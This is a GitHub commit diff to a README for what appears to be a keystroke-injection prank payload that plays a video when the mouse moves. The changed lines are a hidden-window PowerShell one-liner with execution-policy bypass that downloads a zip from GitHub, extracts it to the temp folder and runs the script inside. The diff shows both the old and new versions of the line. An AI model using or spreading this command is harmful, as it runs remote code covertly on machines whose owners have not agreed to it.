Update ReadMe.md

This commit is contained in:
I-Am-Jakoby 2022-12-16 14:16:29 -06:00 committed by GitHub
parent 74fd6ef962
commit c9afed983d
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -47,7 +47,7 @@ When a mouse movement is detected that video will be played in the powershell co
* Plug in your device * Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the dependencies and payload * Invoke-WebRequest will be entered in the Run Box to download and execute the dependencies and payload
``` ```
powershell -w h -NoP -NonI -Exec Bypass $U='https://github.com/I-Am-Jakoby/I-Am-Jakoby/raw/main/Assets/js.zip';$Z="$env:TMP"+'\js.zip';$D="$env:TMP"+'\js';iwr -Uri $U -O $Z;Expand-Archive $Z -DestinationPath $D\ -Force;powershell $D\js\js.ps1 powershell -w h -NoP -NonI -Ep Bypass $D="$env:tmp";iwr -Uri 'https://github.com/I-Am-Jakoby/I-Am-Jakoby/raw/main/Assets/js.zip' -O "$D\js.zip";Expand-Archive "$D\js.zip" -Des $D -Force;. "$D\js\js.ps1"
``` ```
<p align="right">(<a href="#top">back to top</a>)</p> <p align="right">(<a href="#top">back to top</a>)</p>